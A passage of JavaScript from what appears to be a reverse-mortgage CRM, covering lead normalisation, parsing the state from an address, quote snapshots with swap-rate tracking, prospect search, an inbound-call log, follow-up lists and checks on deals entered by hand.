    name:m.name||"",phone:m.phone||"",email:m.email||"",address:addr.trim().replace(/^,\s*/,"")||m.address||"",
    street:m.address||"",city:m.city||"",state:m.state||"",zip:m.zip||"",
    dob:meta.dob||"",age:ageFromDobStr(meta.dob)||0,
    homeValue:_num(m.home_value),mortgageBalance:leadBalance(m),
    lienAmount:hasRecordedLien(m)?_num(m.loan_balance):0,lienIsHecm:lienIsHecm(m),
    curRate:m.rate||meta.curRate||"",lender:m.original_lender||m.lender||"",origDate:m.origination_date||m.close_year||"",
    curPL:meta.curPL||"",curAvail:meta.curAvail||"",estCC:meta.estCC||"",dealType:meta.dealType||"",goal:meta.goal||"",existingLoan:meta.existingLoan||"",
    isReverse:isReverseFrom(meta,null)||(!meta.dealType&&hasRecordedLien(m)),condo:!!meta.condo,
    loanType:m.loan_type||"",source:m.list_source||m.source||"",dmCampaign:m.dm_campaign||m.campaign||"",
    stage:"",statusLabel:m.status||"Lead",
    notes:m.notes||"",
    followUpDate:m.follow_up_date||"",followUpNote:meta.followUpNote||"",
    contactLog:(Array.isArray(m.history)?m.history:[]).filter(function(h){return h&&h.type!=="profile";}),
    quoteLog:meta.quoteLog||[],
    lastContactAt:meta.lastContactAt||m.responded_at||null,
    convertedLoanId:m.converted_loan_id||null,
    doNotContact:!!m.doNotContact,
    archived:false,
    raw:m,
  };
}
// A caller who isn't in either table yet. Phone is pre-seeded when the console
// was opened straight from an inbound-call toast.
function blankProspect(phone){
  return{kind:"new",id:null,name:"",phone:phone||"",email:"",address:"",street:"",city:"",state:"",zip:"",
    dob:"",age:0,homeValue:0,mortgageBalance:0,curRate:"",lender:"",origDate:"",curPL:"",curAvail:"",estCC:"",dealType:"",goal:"",existingLoan:"",
    isReverse:false,condo:false,loanType:"HECM",source:"Call-In",dmCampaign:"",stage:"",statusLabel:"New",
    notes:"",followUpDate:"",followUpNote:"",contactLog:[],quoteLog:[],lastContactAt:null,archived:false,raw:null};
}

// ── Property state + city off an address ──
// Reece, 10/2/26: "if I'm bringing in a lead to the calculator, it should
// already have that information accounted for." Pipeline files have no state
// column — the address is the only source — so the calculator
// (Calc.stateFromRec / cityFromRec) and New Call (prospectToCalcLead) share
// this one reader. It reads the END of the address:
//   "…, Mesa, AZ 85201" · "…, Mesa AZ 85201" · "…, Austin, TX, 78701" ·
//   "…, Austin, Tx 78701" · "Tx 78701" · "…, Mesa TX" · "…, Austin, TX"
// The code must be a real state (US_STATE_CODES). With a zip after it a
// capitalised code always counts; a mixed-case one ("Tx") only alone or after
// a comma-separated city. WITHOUT a zip a city has to sit between a comma and
// the code — ", City, ST" (any case) or ", City ST" (capitals) — so a street
// ending in a suffix or a direction ("1100 Desert Willow Ct", "12 Elm St NE")
// is never read as CT / NE. Not at the end ("…, AZ 85201 (rental)"): the last
// capitalised state with a zip after it, as the old reader took.
// → {state, city} (city "" when the address doesn't say), or null.
var US_STATE_CODES=["AK","AL","AR","AZ","CA","CO","CT","DC","DE","FL","GA","HI","IA","ID","IL","IN","KS","KY","LA","MA","MD","ME","MI","MN","MO","MS","MT","NC","ND","NE","NH","NJ","NM","NV","NY","OH","OK","OR","PA","RI","SC","SD","TN","TX","UT","VA","VT","WA","WI","WV","WY"];
function _isStateCode(c){return US_STATE_CODES.indexOf(c)>=0;}
// The text before a state code: is it ", " right before it, is there a comma
// at all, and the last comma part (the city, when it has no digits).
function _placeHead(before){
  var head=before.replace(/[\s,]+$/,"");
  var ci=head.lastIndexOf(",");
  var seg=(ci>=0?head.slice(ci+1):head).trim();
  return{head:head,commaSep:/,\s*$/.test(before),hasComma:ci>=0,seg:seg,segIsCity:!!seg&&!/\d/.test(seg)};
}
function _placeCity(h){return h.segIsCity&&(h.hasComma||h.commaSep)?h.seg:"";}
function placeFromAddress(addr){
  var s=String(addr==null?"":addr).replace(/\s+/g," ").trim().replace(/[\s,]+(?:USA?|United States(?: of America)?)\.?$/i,"");
  if(!s)return null;
  var zip=/[\s,]*\b\d{5}(?:-\d{4})?$/.exec(s);
  var body=(zip?s.slice(0,zip.index):s).replace(/[\s,.]+$/,"");
  var t=/(^|[\s,])([A-Za-z]{2})$/.exec(body);
  if(t&&_isStateCode(t[2].toUpperCase())){
    var code=t[2].toUpperCase(),caps=t[2]===code;
    var h=_placeHead(body.slice(0,t.index+t[1].length));
    if(zip){
      if(caps||!h.head||h.commaSep||(h.hasComma&&h.segIsCity))return{state:code,city:_placeCity(h)};
    }else if(h.segIsCity&&(h.commaSep||(caps&&h.hasComma))){
      return{state:code,city:h.seg};
    }
  }
  var re=/(^|[\s,])([A-Z]{2})\s*,?\s*\d{5}(?!\d)/g,m,last=null;
  while((m=re.exec(s))!==null){if(_isStateCode(m[2]))last=m;}
  if(last)return{state:last[2],city:_placeCity(_placeHead(s.slice(0,last.index+last[1].length)))};
  return null;
}
function stateFromAddress(addr){var pl=placeFromAddress(addr);return pl?pl.state:"";}
function cityFromAddress(addr){var pl=placeFromAddress(addr);return pl?pl.city:"";}

// The shape Calc's initialLead expects (short-form loan keys). Marketing-only
// prospects carry _marketingOnly so Calc's pitch path knows to mint a real
// pipeline file instead of trying to update a row that doesn't exist.
function prospectToCalcLead(p){
  var base={
    id:p.id||"NEW",b:p.name||"",ph:p.phone||"",em:p.email||"",prop:p.address||"",
    type:p.loanType||"HECM",stage:p.stage||"Prospect",
    hv:_num(p.homeValue),mb:_num(p.mortgageBalance),
    dob:p.dob||"",age:p.age||null,condo:!!p.condo,
    src:p.source||"",dmCampaign:p.dmCampaign||"",
    // Property state drives state-specific fee rules in the calculator (UT/SC
    // no-origination, TN/UT/MO 2% cap). From the lead's state column, else
    // read off the address (stateFromAddress — the calculator's own reader).
    state:String(p.state||stateFromAddress(p.address)||"").trim().toUpperCase(),
    // Closing-cost estimate typed on the lead card (HECM only — FTR doesn't
    // show the field) overrides the last pitch's.
    deal:p.isReverse&&_num(p.estCC)?Object.assign({},(p.raw&&p.raw.deal)||{},{closingCosts:_num(p.estCC)}):((p.raw&&p.raw.deal)||{}),
    // HECM/FTR/HS2 toggle on the lead card decides the calculator's scenario
    // type — HS2 opens it in HomeSafe Second mode, the balance carried as the
    // first lien that stays in place.
    dealKind:p.dealType==="hs2"?"hs2":p.isReverse?"refi":"first",
    // The refi inputs are the balance + current principal limit (10/2/26).
    // No recorded-lien / prior-MCA / prior-loan-kind fields: the calculator's
    // "Existing reverse" panel and its HECM-to-HECM MIP credit are gone (the
    // recorded-lien line lives on the New Call card, off the prospect itself).
    statementData:(p.curPL||p.curAvail||p.curRate)?{principalLimit:p.curPL||"",loc:p.curAvail||"",rate:p.curRate||""}:((p.raw&&p.raw.statementData)||null),
    // The existing reverse's Adjustable / Fixed as last picked in the
    // calculator for this person (the card keeps it — handleQuoteRun), so
    // reopening the numbers reopens on it (calcRules.existingLoanIsFixed).
    existingLoan:p.existingLoan||"",
  };
  if(p.kind!=="loan"){
    base._marketingOnly=true;base._marketingId=p.id;
    // The file a pitch mints belongs to whoever the card says owns it: an
    // owner picked on a new caller's card, else the lead's own owner tag.
    var ow=(p.owner==="reece"||p.owner==="max")?p.owner:leadOwner(p.raw);
    if(ow)base.owner=ow;
  }
  return base;
}

// ── Timestamped contact entries ──────────────────────────────
// Every note, every call, every disposition gets one of these. "at" is the
// ISO instant the information was actually gathered — the thing that was
// missing before, when a note just overwrote the notes box with no date.
function contactEntry(type,text,extra){
  var now=new Date();
  return Object.assign({type:type||"note",text:text||"",at:now.toISOString(),epoch:now.getTime(),
    date:now.toLocaleDateString(),time:now.toLocaleTimeString([],{hour:"2-digit",minute:"2-digit"})},extra||{});
}
// Compact snapshot of a pricing run: what the inputs were and what the top
// products came back at, stamped with when it was run.
// `rateEnv` = {swapRate, cmtIndex, sheetDate} — the market the numbers were run
// in. Stored on every snapshot so a fallout file can answer "what was this
// priced at, and what would today's market do?" WITHOUT needing the scenarios
// table. The 10-yr swap is the one that matters: it sets the expected rate,
// which sets the PLF.
function quoteSnapshot(products,inputs,rateEnv){
  var now=new Date();
  // Calc hands these over sorted by YOUR comp, which puts the 2.75%/3.00%
  // margin tiers on top — the tiers that never get quoted. The snapshot has to
  // read back as "what I told them on the phone", so rank by cash available to
  // the borrower instead; on HECM that naturally surfaces the low margins,
  // because a higher margin raises the expected rate and drops the PLF.
  var top=(products||[]).slice().sort(function(a,b){
    return (b.avail||0)-(a.avail||0);
  }).slice(0,3).map(function(x){var o={
    name:x.name,lender:x.lender,terms:x.terms,plf:x.plf,
    gross:Math.round(x.gross||0),net:Math.round(x.net||0),avail:Math.round(x.avail||0),
    comp:Math.round(x.comp||0),passes:!!x.passes,
    // Where the PLF came from (HUD table / lender table / derived / estimate)
    // and HUD's year-1 draw limit — so a recorded quote says when it was an estimate.
    plfSource:x.plfSource||null,year1:x.year1!=null&&!isNaN(Number(x.year1))?Math.round(Number(x.year1)):null,
  };
    // Borrower credit out of the comp (avail/net include it, comp is net of
    // it): the total, and the share that is a fixed-proprietary origination
    // override. Only when there is one, so older snapshots keep their shape.
    if(x.credit>0)o.credit=Math.round(x.credit);
    if(x.origCredit>0)o.origCredit=Math.round(x.origCredit);
    // Priced on the lender's own figure (the card's Lender's amount / FOA's
    // HomeSafe Second amount) — what was typed and what the calculator had —
    // or a HomeSafe Second tier still on the calculator's estimate, so a
    // recorded run reads as the lender's figure / an estimate, never as a
    // plain calculator number. Only when set, like the credits above.
    if(x.lenderAmount!=null){o.lenderAmount=Math.round(x.lenderAmount);o.calcAmount=Math.round(x.calcGross||0);}
    if(x.hs2Estimate)o.hs2Estimate=true;
    // FOA Bulletin 33 (HomeSafe Std / Intro / Select Intro): which LTVs priced
    // the card — "FOA Bulletin 33 −3 pts" or "pre-10/3 LTVs". Only when set.
    if(x.ltvRule)o.ltvRule=x.ltvRule;
    return o;});
  return{at:now.toISOString(),epoch:now.getTime(),date:now.toLocaleDateString(),
    time:now.toLocaleTimeString([],{hour:"2-digit",minute:"2-digit"}),
    productCount:(products||[]).length,inputs:inputs||{},top:top,
    rateEnv:rateEnv||null};
}

// ── Swap-rate history ─────────────────────────────────────────
// Kept inside settings.rate_sheets (already a jsonb column) under a leading
// underscore, so tracking the market needs no schema migration. Underscore keys
// are skipped by the rate-sheet editor — see the filter in Calc.
function swapHistory(rateSheets){
  var h=(rateSheets||{})._swapHistory;
  return Array.isArray(h)?h:[];
}
function currentSwap(rateSheets){
  var v=parseFloat((((rateSheets||{}).foaHecmAdj)||{}).swapRate);
  return isNaN(v)?null:v;
}
// Append a mark only when the number actually moved — otherwise every keystroke
// and every idle re-save would pile up noise in the history.
function pushSwapMark(rateSheets,swap,cmt){
  var n=parseFloat(swap);
  if(isNaN(n))return swapHistory(rateSheets);
  var hist=swapHistory(rateSheets).slice();
  var last=hist[hist.length-1];
  // De-dupe on BOTH numbers: a 1-yr CMT change at an unchanged swap is a real
  // market move and gets its own mark. No CMT given → swap alone decides.
  var c=(cmt==null||isNaN(parseFloat(cmt)))?null:parseFloat(cmt);
  var sameCmt=c==null?true:(last&&last.cmt!=null&&Math.abs(Number(last.cmt)-c)<0.0005);
  if(last&&Math.abs(Number(last.swap)-n)<0.0005&&sameCmt)return hist;
  var now=new Date();
  hist.push({at:now.toISOString(),epoch:now.getTime(),date:now.toLocaleDateString(),
    swap:n,cmt:(cmt==null||isNaN(parseFloat(cmt)))?null:parseFloat(cmt)});
  return hist.slice(-SWAP_HISTORY_MAX);
}

// ── Re-price sweep WITHOUT the scenarios table ────────────────
// The database version (scenarioStore.fetchRepriceCandidates) is richer, but it
// needs a migration. Every loan already carries its priced history in the
// follow_ups._wf jsonb, and those snapshots now record the swap they were run
// at — so the same question can be answered entirely from memory. This keeps
// the Re-price Radar useful on day one. Once the table exists the radar reads
// BOTH (scenarioStore.mergeRepriceCandidates, fed this with no threshold):
// files priced before the migration are only in this history.
//
// Returns one row per file whose NEWEST priced run (quote or pitch, any swap)
// happened at a swap at least `minDrop` above today's. The newest run decides:
// a re-price or re-quote at today's market means he has already worked this
// person at this swap, so they drop off the call list. (The old version
// threw away every run below the threshold BEFORE picking the newest, so a
// file stayed on the radar forever after it was re-priced.)
function repriceCandidatesFromLoans(loans,swapNow,minDrop){
  var cur=parseFloat(swapNow);
  if(isNaN(cur))return[];
  var threshold=cur+(minDrop==null?0.125:minDrop);
  var out=[];
  (loans||[]).forEach(function(l){
    var runs=[];
    (l.quoteLog||[]).forEach(function(q){
      var s=q&&q.rateEnv&&parseFloat(q.rateEnv.swapRate);
      if(!isNaN(s))runs.push({epoch:q.epoch||(q.at?Date.parse(q.at)||0:0),swap:s,at:q.at,date:q.date,
        product:(q.top||[])[0]&&q.top[0].name,lender:(q.top||[])[0]&&q.top[0].lender,
        avail:(q.top||[])[0]&&q.top[0].avail,kind:"quote"});
    });
    (l.scenarioHistory||[]).forEach(function(h){
      var s=h&&h.rateEnv&&parseFloat(h.rateEnv.swapRate);
      if(!isNaN(s))runs.push({epoch:h.timestamp?(Date.parse(h.timestamp)||0):(h.epoch||0),swap:s,
        at:h.timestamp,date:h.date,product:h.product,lender:h.lender,avail:h.cashToBorrower,kind:"pitch"});
    });
    if(!runs.length)return;
    runs.sort(function(a,b){return (b.epoch||0)-(a.epoch||0);});
    var r=runs[0];
    if(r.swap<threshold-1e-9)return;
    out.push({
      id:l.id,loan_id:l.id,lead_id:l.sourceLeadId||null,
      borrower_name:l.b||"",phone:l.ph||"",property:l.prop||"",
      home_value:l.hv||0,mortgage_balance:l.mb||0,
      kind:r.kind,product:r.product||null,lender:r.lender||null,
      cash_to_borrower:r.avail||null,
      // run_epoch lets the radar line this run up against the scenarios table
      // (scenarioStore.mergeRepriceCandidates) even when the snapshot only
      // kept an epoch and no ISO time.
      run_at:r.at||(r.epoch>0?new Date(r.epoch).toISOString():null),run_epoch:r.epoch||0,swap_rate:r.swap,
      swapDrop:Number((r.swap-cur).toFixed(3)),
      stage:l.stage,archived:!!l.archived,
      _local:true,
    });
  });
  out.sort(function(a,b){return b.swapDrop-a.swapDrop;});
  return out;
}

// ═══════════════════════════════════════════════════════════════
// PROSPECT SEARCH INDEX
// ═══════════════════════════════════════════════════════════════
// The marketing table is ~70K rows. Rebuilding a lowercase haystack for every
// row on every keystroke is what made the existing search boxes feel dead.
// Build the haystack ONCE per data change (memoize on the array identity),
// then each keystroke is a substring scan over pre-built strings.
function buildProspectIndex(rows,kind){
  if(kind==="loan"){
    return (rows||[]).map(function(l){
      return{kind:"loan",id:l.id,name:l.b||"(unnamed)",sub:l.prop||"",ph:l.ph||"",
        status:l.stage||"",archived:!!l.archived,raw:l,
        hay:[l.b,l.id,l.prop,l.em,l.type,l.stage,l.ref,l.src].join(" ").toLowerCase(),
        digits:String(l.ph||"").replace(/[^0-9]/g,"")};
    });
  }
  return (rows||[]).map(function(m){
    return{kind:"lead",id:m.id,name:m.name||"(unnamed)",sub:[m.address,m.city,m.state].filter(Boolean).join(", "),
      ph:m.phone||"",status:m.status||"Lead",archived:false,raw:m,
      hay:[m.name,m.id,m.address,m.city,m.state,m.zip,m.email,m.original_lender,m.list_source,m.status,m.loan_type].join(" ").toLowerCase(),
      digits:String(m.phone||"").replace(/[^0-9]/g,"")};
  });
}
// Token-AND across the pre-built haystack, plus a digits-only phone match so
// "6025551234", "602-555-1234" and "(602) 555 1234" all find the same person.
// Pipeline files rank above mail-list rows: if he already has a file open on
// someone, that is the record he means.
function searchProspectIndex(indexes,query,limit){
  var raw=String(query||"").trim();
  if(raw.length<2)return[];
  var tokens=raw.toLowerCase().split(/\s+/).filter(Boolean);
  var qd=raw.replace(/[^0-9]/g,"");
  // Only treat the query as a phone number when it is ALL digits/punctuation.
  // Matching digits inside an address search ("4521 Maple") would drag in every
  // lead whose phone happens to contain 4521 — at 70K rows that buries the one
  // house he is actually looking for. Four digits is enough once we know the
  // query is a number, which covers "read me back the last four".
  var byPhone=qd.length>=4&&/^[\d\s().+-]+$/.test(raw);
  // RingCentral hands over E.164 ("+16025556789") while the CRM stores
  // "(602) 555-6789". Comparing those raw never matches, which is exactly how
  // an inbound call from a lead already in the database read as "unknown".
  // Drop the country code so both forms land on the same 10 digits.
  if(byPhone&&qd.length>10)qd=qd.slice(-10);
  var cap=limit||30;
  var hardCap=cap*4;
  var out=[];
  for(var i=0;i<indexes.length&&out.length<hardCap;i++){
    var arr=indexes[i];
    for(var j=0;j<arr.length;j++){
      var r=arr[j];
      var hit=false;
      if(byPhone&&r.digits&&r.digits.indexOf(qd)>=0)hit=true;
      if(!hit){
        hit=true;
        for(var t=0;t<tokens.length;t++){if(r.hay.indexOf(tokens[t])<0){hit=false;break;}}
      }
      if(hit){out.push(r);if(out.length>=hardCap)break;}
    }
  }
  out.sort(function(a,b){
    if(a.kind!==b.kind)return a.kind==="loan"?-1:1;
    if(a.archived!==b.archived)return a.archived?1:-1;
    return String(a.name).localeCompare(String(b.name));
  });
  return out.slice(0,cap);
}

// ═══════════════════════════════════════════════════════════════
// INBOUND CALL LOG (per device, localStorage)
// ═══════════════════════════════════════════════════════════════
// The inbound-call toast auto-dismissed after 30 seconds and kept no record.
// Step away from the desk and the call was simply gone. This ring buffer is
// the "who rang me" list the New Call console opens with.
function readCallLog(){
  try{var v=localStorage.getItem(CALL_LOG_KEY);if(!v)return[];var a=JSON.parse(v);return Array.isArray(a)?a:[];}
  catch(e){return[];}
}
function writeCallLog(arr){
  try{localStorage.setItem(CALL_LOG_KEY,JSON.stringify((arr||[]).slice(0,CALL_LOG_MAX)));}catch(e){}
}
function pushCallLog(entry){
  var arr=readCallLog();
  // The same number ringing twice inside a minute is one call, not two rows.
  var d=String(entry.from||"").replace(/[^0-9]/g,"").slice(-10);
  var now=entry.epoch||Date.now();
  arr=arr.filter(function(x){
    return !(String(x.from||"").replace(/[^0-9]/g,"").slice(-10)===d&&Math.abs((x.epoch||0)-now)<60000);
  });
  arr.unshift(entry);
  writeCallLog(arr);
  return arr.slice(0,CALL_LOG_MAX);
}
function markCallHandled(epoch,how){
  var arr=readCallLog().map(function(x){return x.epoch===epoch?Object.assign({},x,{handled:true,handledAs:how||"worked"}):x;});
  writeCallLog(arr);
  return arr;
}

// ── Follow-up clock ───────────────────────────────────────────
// Returns YYYY-MM-DD n days out, in LOCAL time. (toISOString() would shift the
// date backwards for anyone west of UTC — a "call back tomorrow" set at 6pm
// in Arizona would land on today.)
function isoDatePlus(days){
  var d=new Date();d.setDate(d.getDate()+(days||0));
  return d.getFullYear()+"-"+String(d.getMonth()+1).padStart(2,"0")+"-"+String(d.getDate()).padStart(2,"0");
}
function isDueBy(dateStr,todayStr){
  if(!dateStr)return false;
  return String(dateStr).slice(0,10)<=(todayStr||isoDatePlus(0));
}
function fmtWhen(iso){
  if(!iso)return"";
  try{var d=new Date(iso);if(isNaN(d.getTime()))return String(iso);return d.toLocaleDateString()+" "+d.toLocaleTimeString([],{hour:"2-digit",minute:"2-digit"});}
  catch(e){return String(iso);}
}

// ── Once a lead is a file, the FILE owns the call back ──
// A lead that became a pipeline file is worked AS that file from then on: New
// Call opens the file card, a pitch revives the file and clears ITS follow-up,
// a re-disposition dates the file. None of that touches the lead's own
// follow_up_date (kept so the date survives if the file is ever deleted), so
// that stale date used to stay on Follow-ups, the bell and the Prospect lane
// for good — a live Pitched deal listed as an overdue lead. The lead's date
// is ignored when its file (convertedLoanFor) either
//   • has a follow-up date of its own — due, or set past the horizon; or
//   • was worked after the lead was last worked (the lead's date was set then
//     or before): contacted on New Call (lastContactAt), pitched / re-priced
//     (its last scenario), or fallen out (falloutAt).
// A promoted file nobody has worked yet (no date, no contact) keeps the
// lead's date.
function _whenMs(v){var n=v?Date.parse(v):NaN;return isNaN(n)?0:n;}
function fileLastWorkedMs(l){
  if(!l)return 0;
  var h=Array.isArray(l.scenarioHistory)?l.scenarioHistory:[];
  var last=h.length?h[h.length-1]:null;
  return Math.max(_whenMs(l.lastContactAt),_whenMs(l.falloutAt),last?_whenMs(last.timestamp):0);
}
function fileOwnsCallBack(lead,loans){
  var file=convertedLoanFor(lead,loans);
  if(!file)return false;
  if(file.followUpDate)return true;
  var worked=fileLastWorkedMs(file);
  if(!worked)return false;
  var leadAt=_whenMs(leadMetaFrom(lead.history).lastContactAt)||_whenMs(lead.responded_at)||_whenMs(lead.created_at);
  return worked>leadAt;
}

// ═══════════════════════════════════════════════════════════════
// Follow-ups due across BOTH stores.
// Lives here (not in a view) so the console, the dashboard and anything else
// can share one implementation without a view importing another view.
// `through` (YYYY-MM-DD, optional) reaches past today — the Command Center's
// Follow-ups panel lists the next week too. Default: due by today only.
// ═══════════════════════════════════════════════════════════════
function collectDueFollowUps(loans,mktgLeads,today,through){
  const t=today||isoDatePlus(0);
  const until=through&&through>t?through:t;
  const out=[];
  // A dispositioned lead gets the follow-up date written to BOTH its mail-list
  // row and the pipeline file that was minted from it — the lead row keeps it
  // so the date survives if the file is ever deleted. For the call-back list,
  // though, one person must be one row: track which loan ids are already
  // listed, plus the lead ids they came from, and drop the duplicate lead.
  const loanIds=Object.create(null);
  const supersededLeads=Object.create(null);
  (loans||[]).forEach(function(l){
    if(!l.followUpDate)return;
    if(!isDueBy(l.followUpDate,until))return;
    loanIds[l.id]=1;
    if(l.sourceLeadId)supersededLeads[l.sourceLeadId]=1;
    out.push({kind:"loan",id:l.id,name:l.b||"(unnamed)",date:String(l.followUpDate).slice(0,10),
      note:l.followUpNote||"",label:l.stage,overdue:String(l.followUpDate).slice(0,10)<t,
      phone:l.ph||"",raw:l});
  });
  // An opted-out (do-not-contact) lead is still listed: that flag keeps it
  // off mailings and the Outbound dialer only (Reece, 10/1) — a call back he
  // set is still his to make. The row carries optedOut for an info chip.
  (mktgLeads||[]).forEach(function(m){
    if(!m.follow_up_date)return;
    if(!isDueBy(m.follow_up_date,until))return;
    // Already represented by its pipeline file, either way round the link is
    // recorded (loan.sourceLeadId or lead.converted_loan_id).
    if(supersededLeads[m.id])return;
    if(m.converted_loan_id&&loanIds[m.converted_loan_id])return;
    // …or its file owns the call back now, due or not (fileOwnsCallBack).
    if(fileOwnsCallBack(m,loans))return;
    out.push({kind:"lead",id:m.id,name:m.name||"(unnamed)",date:String(m.follow_up_date).slice(0,10),
      note:leadMetaFrom(m.history).followUpNote||"",label:m.status||"Lead",
      overdue:String(m.follow_up_date).slice(0,10)<t,phone:m.phone||"",
      optedOut:!!(m.doNotContact||m.do_not_contact),raw:m});
  });
  out.sort(function(a,b){return a.date<b.date?-1:a.date>b.date?1:0;});
  return out;
}

// ═══════════════════════════════════════════════════════════════
// Due call backs in the Pipeline's Prospect lane.
// Reece, 10/1/26: "have callbacks Due and that function automatically show
// as prospect". Every due call back collectDueFollowUps finds — fallout (or
// otherwise archived) files with a due followUpDate, mail-list leads with a
// due follow_up_date — is a card in the Prospect lane. DISPLAY ONLY: no
// stage, archived flag or fallout reason changes until the call is worked.
// One person = one card: a file that is already a card on the board
// (`onBoard(file)`, default: live and not archived) keeps that card and is
// badged instead — `badges` maps its id to the earliest due date — and so is
// the file a due lead was converted into, when that file is on the board.
// Each card is the collectDueFollowUps row plus `owner`: the file's owner, a
// lead's owner tag, else the owner of the file it became, else Reece.
// ═══════════════════════════════════════════════════════════════
function prospectLaneCallbacks(loans,mktgLeads,today,onBoard){
  var isOn=typeof onBoard==="function"?onBoard:function(l){return !l.archived&&!isFallout(l);};
  var cards=[];var badges=Object.create(null);
  collectDueFollowUps(loans,mktgLeads,today).forEach(function(f){
    var file=f.kind==="loan"?f.raw:convertedLoanFor(f.raw,loans);
    if(file&&isOn(file)){
      if(!badges[file.id]||f.date<badges[file.id])badges[file.id]=f.date;
      return;
    }
    var owner=f.kind==="loan"?ownerOf(f.raw):(leadOwner(f.raw)||(file?ownerOf(file):"reece"));
    cards.push(Object.assign({},f,{owner:owner}));
  });
  return{cards:cards,badges:badges};
}

// ═══════════════════════════════════════════════════════════════
// Command Center → Follow-ups (Reece, 10/2/26: "I do want some sort of follow
// up or notification screen for notes and appointments to follow up on.. But
// i don't need the to do list like that.")
// Two sources, one list, grouped overdue / today / the next `days` days:
//   • every follow-up date he set and its note — files, fallout files and
//     mail-list leads (collectDueFollowUps: one person = one row);
//   • the appointments on live files (never archived / fallout): counseling,
//     the appraisal visit and the closing. Only real dates — "TBD" or any
//     text that isn't a date is skipped. A past appointment stays listed (as
//     overdue) only while the file still hasn't moved past it: counseling
//     before Docs Out, an appraisal with no completed date before
//     Underwriting. The closing date only counts once a file is Approved or
//     Clear to Close (the estimate a pitch stamps 60 days out isn't a
//     closing anyone scheduled), and drops off at Closed / Funded.
// Sorted by date (oldest overdue first), then counseling · appraisal ·
// closing · follow-up, then name. Each item:
//   {key, kind:"loan"|"lead", what:"followup"|"counseling"|"appraisal"|"closing",
//    id, name, date (YYYY-MM-DD), time, note, label, phone, optedOut, group:
//    "overdue"|"today"|"week", overdue, raw}
// ═══════════════════════════════════════════════════════════════
var FOLLOWUP_HORIZON_DAYS=7;
var APPT_LABELS={counseling:"Counseling",appraisal:"Appraisal",closing:"Closing"};
var FOLLOWUP_ORDER={counseling:0,appraisal:1,closing:2,followup:3};
function isoDay(v){
  var d=parseDateLocal(v);
  return d?d.getFullYear()+"-"+String(d.getMonth()+1).padStart(2,"0")+"-"+String(d.getDate()).padStart(2,"0"):null;
}
function isoDayPlus(iso,n){var d=parseDateLocal(iso);if(!d)return iso;d.setDate(d.getDate()+(n||0));return isoDay(d);}
// The appointments on one file: [{what,date,time}] (see above for the rules).
function fileAppointments(l,today){
  var out=[];
  if(!l||l.archived||isFallout(l))return out;
  var st=normalizeStage(l.stage);
  if(st==="Closed"||st==="Funded")return out;
  var c=(l.counseling&&typeof l.counseling==="object")?l.counseling:{};
  var cd=isoDay(l.counselingDate||c.date);
  if(cd&&(cd>=today||!stageAtOrPast(l,"Docs Out"))){
    var ct=(c.time&&c.time!=="TBD"&&isoDay(c.date)===cd)?String(c.time):"";
    out.push({what:"counseling",date:cd,time:ct});
  }
  var ad=l.appraisalDone?null:isoDay(l.appraisalScheduled);
  if(ad&&(ad>=today||!stageAtOrPast(l,"Underwriting")))out.push({what:"appraisal",date:ad,time:""});
  var close=(st==="Approved"||st==="Clear to Close")?isoDay(l.estClose):null;
  if(close)out.push({what:"closing",date:close,time:""});
  return out;
}
function collectFollowUpItems(loans,mktgLeads,today,days){
  var t=isoDay(today)||isoDatePlus(0);
  var horizon=isoDayPlus(t,days==null?FOLLOWUP_HORIZON_DAYS:Math.max(0,days));
  var groupOf=function(d){return d<t?"overdue":d===t?"today":"week";};
  var items=[];
  collectDueFollowUps(loans,mktgLeads,t,horizon).forEach(function(f){
    items.push({key:f.kind+"-"+f.id+"-followup",kind:f.kind,what:"followup",id:f.id,name:f.name,date:f.date,time:"",
      note:f.note||"",label:f.label||"",phone:f.phone||"",optedOut:!!f.optedOut,group:groupOf(f.date),overdue:f.date<t,raw:f.raw});
  });
  (loans||[]).forEach(function(l){
    fileAppointments(l,t).forEach(function(a){
      if(a.date>horizon)return;
      items.push({key:"loan-"+l.id+"-"+a.what,kind:"loan",what:a.what,id:l.id,name:l.b||"(unnamed)",date:a.date,time:a.time,
        note:APPT_LABELS[a.what],label:normalizeStage(l.stage)||"",phone:l.ph||"",optedOut:false,group:groupOf(a.date),overdue:a.date<t,raw:l});
    });
  });
  items.sort(function(a,b){
    if(a.date!==b.date)return a.date<b.date?-1:1;
    var o=FOLLOWUP_ORDER[a.what]-FOLLOWUP_ORDER[b.what];if(o)return o;
    return String(a.name).localeCompare(String(b.name));
  });
  return items;
}
// The top-bar bell: follow-ups + appointments that are overdue or due today.
function followUpAlertCount(loans,mktgLeads,today){return collectFollowUpItems(loans,mktgLeads,today,0).length;}

// ═══════════════════════════════════════════════════════════════
// A DEAL ENTERED BY HAND — "Add a deal" on the Pipeline
// ═══════════════════════════════════════════════════════════════
// Reece closed a HomeSafe Second in the lender's software (10/1/26) and the
// CRM had no way to take it. These build a normal pipeline file from what he
// types off the lender's paperwork. Every deal figure on it is HIS figure,
// not a calculator output, so the deal carries manual:true + "Entered by
// hand" and every screen that shows it says so. The entry is also the file's
// first scenarioHistory row and a scenarios row (kind "pitch") — the quote
// history stays complete. rateEnv is left empty on purpose: it wasn't priced
// at this app's market, so the Re-price Radar has nothing honest to compare.
function manualProgram(name){
  for(var i=0;i<MANUAL_DEAL_PROGRAMS.length;i++){if(MANUAL_DEAL_PROGRAMS[i].name===name)return MANUAL_DEAL_PROGRAMS[i];}
  return null;
}
// "9.49" → "9.49%", "1.75" on a margin program → "1.75% margin"; anything
// that isn't a plain number is kept exactly as typed.
function fmtManualRate(text,kind){
  var t=String(text==null?"":text).trim();
  if(!t)return"";
  var m=/^(\d+(?:\.\d+)?)\s*%?$/.exec(t);
  if(!m)return t;
  return m[1]+"%"+(kind==="margin"?" margin":"");
}
// Gentle checks — warnings only. Nothing here ever blocks the save; the one
// hard requirement (a name) is the form's, not a warning.
function manualDealWarnings(f){
  var w=[];var x=f||{};var p=manualProgram(x.program)||{};
  var second=!!p.second;
  var hv=_num(x.homeValue),mb=_num(x.balance),amt=_num(x.amount),cash=_num(x.cash),comp=_num(x.comp);
  var $=function(n){return"$"+Math.round(n).toLocaleString("en-US");};
  if(!String(x.phone||"").trim()&&!String(x.email||"").trim())w.push("No phone or email — there'll be no way to reach them from the file.");
  var dob=String(x.dob||"").trim();
  if(!dob)w.push("No date of birth — the file won't show an age.");
  else{
    var a=ageFromDobStr(dob);
    if(a==null)w.push("The date of birth doesn't look right.");
    else if(/^HECM\b/i.test(String(x.program||""))&&a<62)w.push("Youngest borrower is "+a+" — a HECM needs 62.");
    else if(a<55)w.push("Youngest borrower is "+a+" — under every program's minimum age.");
  }
  if(!x.lender)w.push("No lender picked.");
  if(!x.program)w.push("No program picked.");
